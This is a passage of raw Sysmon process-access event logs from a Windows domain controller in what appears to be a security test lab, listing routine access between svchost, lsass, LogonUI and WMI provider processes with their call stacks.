indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E46-6005-0F00-00000000A301}11161256C:\Windows\System32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.368{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 